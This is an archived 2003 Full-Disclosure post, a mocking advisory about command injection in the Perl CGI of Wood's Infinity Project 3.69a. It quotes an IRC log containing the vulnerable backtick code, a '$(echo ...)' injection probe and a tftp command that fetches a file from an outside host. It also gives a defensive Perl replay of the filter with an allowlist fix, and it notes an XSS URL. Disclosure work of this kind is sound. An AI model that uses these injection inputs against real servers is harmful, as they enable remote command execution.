Full Disclosure mailing list archives

Wood's Infinity Project 3.69a Remote Command Execution


From: "badpack3t" <badpack3t () security-protocols com>
Date: Thu, 12 Jun 2003 18:49:41 -0400 (EDT)

This advisory is for "Wood's Infinity Project 3.69a" available at:
http://exploit.wox.org/thecore/W-infscan-369a.zip

[17:10] * Now talking in #morning_wood
[17:10] * Topic is ''
[17:10] * Set by ChanServ on Wed Jun 11 04:19:51
[17:10] <b0iler> morning_wood knows security well?
[17:10] <b0iler> I need help.
[17:11] <b0iler> is this morning_wood?
[17:15] <{DWL}Vinyl> ya
[17:15] <{DWL}Vinyl> wassup
[17:15] <b0iler> you are any good at perl security?
[17:16] <{DWL}Vinyl> some ya
[17:16] <b0iler> I need help verifying if this vuln is exploitable.
[17:16] <{DWL}Vinyl> hey
[17:16] <{DWL}Vinyl> can you
[17:16] <{DWL}Vinyl> go to
[17:17] <{DWL}Vinyl> exploitlabs.com:6667
[17:17] <{DWL}Vinyl> .#0sec
[17:17] <{DWL}Vinyl> it my server

[17:17] * Now talking in #0sec
[17:17] * Topic is 'http://nothackers.org - 0day - Freedom of Voice - Freedom of Choice'
[17:17] * Set by MrWood on Tue Jun 10 22:13:11
[17:17] <#0sec> Welcome to 0sec
[17:18] <b0iler>        @values = split(/\&/,$ENV{'QUERY_STRING'});
[17:18] <b0iler>        foreach $i (@values) {
[17:18] <b0iler>                ($varname, $mydata) = split(/=/,$i);
[17:18] <b0iler>                $FORM{$varname} = $mydata;
[17:18] <b0iler>        }
[17:18] <b0iler>        $host = "$FORM{'host'}";
[17:18] <b0iler>        $host =~ tr/+/ /;
[17:18] <b0iler>        $host =~ tr/\%/a/;
[17:18] <b0iler>         $host =~ tr/\;/b/;
[17:18] <b0iler>        $host =~ tr/</c/;
[17:19] <b0iler>        $host =~ tr/>/d/;
[17:19] <b0iler>        $host =~ tr/\|/e/;
[17:19] <b0iler>        $host =~ tr/\&/f/;
[17:19] <b0iler>        $host =~ tr/\^/g/;
[17:19] <b0iler>        $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
[17:19] <b0iler>        $hostname = `$nslookuplocation $host`;
[17:19] <MrWood> shell code?
[17:19] <b0iler> ?
[17:19] <b0iler> .cgi?host=$(echo 'h0n0!')
[17:19] <MrWood> hehe
[17:19] <b0iler> that would execute commands on this server.. right?
[17:20] <MrWood> you want to run this on a remote server?
[17:20] <b0iler> this is in a .cgi
[17:20] <MrWood> havin the .pl on it first
[17:20] <MrWood> ?
[17:20] <b0iler> I want to find vulnerabilities in this .cgi
[17:20] <b0iler> I believe this is one.
[17:20] <MrWood> ahhh
[17:20] <b0iler> you see.. the programmer of this .cgi is not very knowledgeable.
[17:20] <MrWood> do you have a httpd with perl?
[17:21] <b0iler> I think they have problems in their code.
[17:21] <MrWood> if you uploaded the cgi to me
[17:21] <MrWood> i could let you access it on my box, but i run NT
[17:22] <MrWood> wtf is         $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
[17:22] <b0iler> that is converting url encoding into ascii
[17:22] <b0iler> %hexhex into ascii
[17:22] <MrWood> isn't that hex for a serial port?
[17:23] <b0iler> MrWood: you already have the .cgi.
[17:23] <MrWood> i do?
[17:23] <b0iler> it is nph-exploitscanget.cgi
[17:23] <b0iler> you programmed it.
[17:23] <MrWood> where?
[17:23] <MrWood> url?
[17:23] <b0iler> http://exploit.wox.org/thecore/W-infscan-369a.zip
[17:24] <MrWood> the worst is
[17:24] <MrWood> on that
[17:24] <MrWood> there is a call
[17:24] <MrWood> to local nslookup
[17:24] <MrWood> if you replace
[17:24] <MrWood> 'nslookup'
[17:24] <MrWood> with ummm
[17:24] <MrWood> lets say
[17:25] <MrWood> tftp - yourhost.com get file.ext file.ext
[17:25] <MrWood> it should execute local
[17:25] <MrWood> :)
[17:25] <b0iler> what you say makes no sense at all.
[17:26] <MrWood> if you replace that call
[17:26] <MrWood> then upload it to remote server
[17:27] <b0iler> and get... *gasp* cgi privileges on a local server.  lol.
[17:27] <MrWood> it will execute the call you replaced when the script hits that function
[17:27] <MrWood> yes
[17:27] <b0iler> I will be posting this log to FD list.
[17:30] <b0iler> your security list is a joke. your website is a joke. your code is a joke.
[17:30] <MrWood> i have 3 advisories on hold
[17:30] * Disconnected (Quit: joke.)
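
The filter sequence pasted in the log, replayed as an added example written for this page (Perl; not code from the original post or from the Infinity Project): it shows which shell-significant characters the denylist leaves in place before the value reaches backticks, and the allowlist plus list-form open() pattern a maintainer would use instead. The names original_filter, surviving_metachars, valid_hostname and safe_lookup, and the sample inputs, are chosen here.

```perl
#!/usr/bin/perl
# Added example, not code from the original post or the Infinity Project:
# replays the pasted denylist filter, reports which shell-significant
# characters it leaves behind, and shows an allowlist + no-shell replacement.
use strict;
use warnings;
# The pasted transformations, in the pasted order. tr/\%/a/ runs BEFORE the
# %XX decode, so that decode never fires; the gap is what the denylist omits.
sub original_filter {
    my ($host) = @_;
    $host =~ tr/+/ /;   $host =~ tr/\%/a/;  $host =~ tr/\;/b/;
    $host =~ tr/</c/;   $host =~ tr/>/d/;   $host =~ tr/\|/e/;
    $host =~ tr/\&/f/;  $host =~ tr/\^/g/;
    $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    return $host;
}

# Characters that make Perl backticks route the command through /bin/sh and
# that sh then interprets; returns the ones still present after filtering.
sub surviving_metachars {
    my ($s) = @_;
    return grep { index($s, $_) >= 0 } ('$', '`', '(', ')', "'", '"', "\n", ' ');
}

# Hardened replacement: accept only a syntactically valid hostname (RFC 1123
# label rules) and never build a shell command string from user input.
sub valid_hostname {
    my ($host) = @_;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return (length($host) <= 253 && $host =~ /\A$label(?:\.$label)*\z/) ? 1 : 0;
}

sub safe_lookup {
    my ($nslookup, $host) = @_;
    die "refusing invalid hostname\n" unless valid_hostname($host);
    # List-form open: argv goes straight to execvp, no shell parses it.
    open(my $fh, '-|', $nslookup, $host) or die "cannot run $nslookup: $!\n";
    my $out = do { local $/; <$fh> };
    close($fh);
    return $out;
}
# Constructed inputs: a real hostname, the log's harmless $(echo ...) probe,
# and one built only from characters the denylist does cover.
for my $in ('www.example.com', '$(echo hi)', 'a;b|c') {
    my $f = original_filter($in);
    my @left = surviving_metachars($f);
    printf "%-16s -> '%-11s' left: %-5s valid hostname: %d\n",
        $in, $f, (@left ? join('', @left) : 'none'), valid_hostname($in);
}
```

Only the third input is neutralized by the denylist, and even it is rejected by the allowlist; the probe copied from the log passes the filter untouched, which is why validation of the hostname and a shell-free process launch are the fix rather than a longer tr/// list.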

There is a massive XSS problem in the 404 script mrwood uses.  Here is a PoC
for this 0day advisory: http://exploit.wox.org/<b>a</b>
There is a serious plain text password and default password problem in the
script available at: http://take.candyfrom.us/bionet-logger1-2.zip

There is also an advisory on the 0day (http://nothackers.org) list's use of
its own "wood-discloser" (some kind of strange full-discloser mutation with
no vendor notification, no exploit code, flaky vulnerabilities, and "0days"
which do not compile - they only form structures of poorly written English
sentences).  It claims it releases information immediately, but as the log
shows mrwood himself is withholding vulnerability information from the
public.  According to mrwood's own logic, this is putting
10trillion,billion,million people at risk from 0days and attack.
Wood-discloser will save us all from attack!  Praise Ali!

peace out,

---------------------------
badpack3t
founder
www.security-protocols.com
---------------------------


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
